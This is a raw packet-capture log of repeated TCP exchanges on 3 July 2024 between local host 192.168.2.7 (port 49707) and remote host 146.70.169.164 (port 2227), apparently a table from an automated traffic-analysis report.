                                        Jul 3, 2024 18:02:10.204037905 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.251949072 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.252219915 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.300232887 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.300348997 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.351965904 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.352116108 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.399952888 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.400136948 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.451956034 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.452128887 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.504014015 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.504117012 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.555973053 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.556173086 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.604033947 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.604217052 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.651932001 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.652141094 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.700133085 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.700514078 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.748106003 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.748414040 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.796139002 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.796205044 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.844001055 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.844106913 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.895927906 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.896200895 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.944077969 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.944149971 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:10.992295027 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:10.992362976 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.039977074 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.040038109 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.088411093 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.088462114 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.139878988 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.139924049 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.187884092 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.187935114 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.238617897 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.238677979 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.288002014 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.288064003 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.336090088 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.336160898 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.384061098 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.384128094 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.431917906 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.431977034 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.483880043 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.483935118 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.532103062 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.532159090 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.583880901 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.583933115 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.631912947 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.631984949 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.679912090 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.679960966 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.731952906 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.732013941 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.779936075 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.779987097 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.831928968 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.831983089 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.880390882 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.880451918 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.927921057 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.927961111 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:11.975954056 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:11.976011038 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.028053045 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.028120995 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.080429077 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.080559015 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.131877899 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.132406950 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.183902979 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.183970928 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.231903076 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.232028961 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.279973984 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.280061960 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.331934929 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.334007025 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.379980087 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.380053997 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.428822994 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.428880930 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.476063013 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.476640940 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.531629086 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.531694889 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.584207058 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.584275961 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.636583090 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.636746883 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.683887959 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.683984041 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.735908985 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.735991955 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.788055897 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.788115978 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.839989901 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.842690945 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.888103962 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.888170004 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.939971924 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.940186024 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:12.988087893 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:12.988266945 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.039936066 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.040245056 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.092012882 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.092086077 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.139883995 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.139962912 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.187972069 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.188049078 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.235944033 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.236079931 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.283926964 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.283982992 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.331926107 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.332032919 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.379916906 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.379981041 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.427963018 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.428040028 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.479999065 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.482363939 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.527998924 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.528083086 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.577238083 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.577342033 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.624983072 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.625045061 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.671953917 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.672024965 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.719961882 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.720026970 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.768093109 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.768186092 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.817167044 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.817239046 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.863914013 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.864005089 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.921530008 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.921684027 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:13.967899084 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:13.967963934 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.015981913 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.016129971 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.064075947 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.064254045 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.111934900 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.112006903 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.163880110 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.163944960 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.212068081 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.213166952 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.259942055 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.259994030 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.307917118 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.307993889 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.359941006 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.360064983 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.411915064 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.412137985 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.459897995 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.459975004 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.507957935 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.508030891 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.555892944 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.555973053 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.603916883 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.603990078 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.656622887 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.656697035 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.707894087 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.707951069 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.755930901 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.758018017 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.803880930 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.803941011 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.855885029 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.855930090 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.903877974 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.903939009 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:14.955888033 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:14.955935955 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.007904053 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.007958889 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.055869102 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.055911064 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.107939959 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.108004093 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.159945011 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.160006046 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.207895041 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.208074093 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.255908966 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.256027937 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.304017067 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.304109097 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.351900101 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.351953030 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.399929047 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.399993896 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.447956085 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.448018074 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.499953985 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.500014067 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.553673983 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.553730011 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.602433920 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.602500916 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.648863077 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.648931026 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.696993113 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.697061062 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.743916035 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.743990898 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.795995951 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.796052933 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.844090939 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.844161987 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.891911983 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.891979933 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.939905882 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.939977884 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:15.987879038 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:15.987941027 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.035950899 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.036154032 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.083987951 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.084103107 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.131920099 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.131998062 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.179860115 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.179912090 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.231906891 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.231966972 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.279985905 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.280045033 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.331885099 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.332076073 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.379889965 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.379951954 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.427932978 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.428008080 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.475879908 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.476241112 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.524919033 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.525012016 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.571922064 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.571983099 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.619923115 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.619975090 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.669105053 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.669214010 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.715848923 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.715944052 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.768022060 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.768085003 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.815887928 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.815957069 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.863888025 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.863940954 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.911957979 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.912025928 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:16.959893942 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:16.959959030 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.011985064 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.012042999 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.059890985 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.059938908 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.107975960 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.108099937 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.155983925 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.156040907 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.203871965 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.203927994 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.251877069 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.251929045 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.299880028 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.299936056 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.351877928 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.351928949 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.403861046 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.403903961 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.455909014 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.455965996 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.504388094 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.504471064 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.551938057 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.552030087 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.599935055 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.600018978 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.651949883 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.652004004 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.705859900 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.705914974 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.751964092 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.752031088 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.803827047 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.803880930 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.851831913 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.851874113 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.904520988 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.904706955 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:17.951927900 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:17.951981068 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.000368118 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.000431061 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.048021078 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.048131943 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.099904060 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.100052118 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.148000002 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.148180008 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.195909023 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.196047068 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.244076967 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.244287014 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.296009064 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.296148062 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.343902111 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.344152927 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.391963005 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.394059896 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.439845085 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.442090034 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.491934061 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.492079973 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.539887905 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.542081118 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.591913939 CEST222749707146.70.169.164192.168.2.7
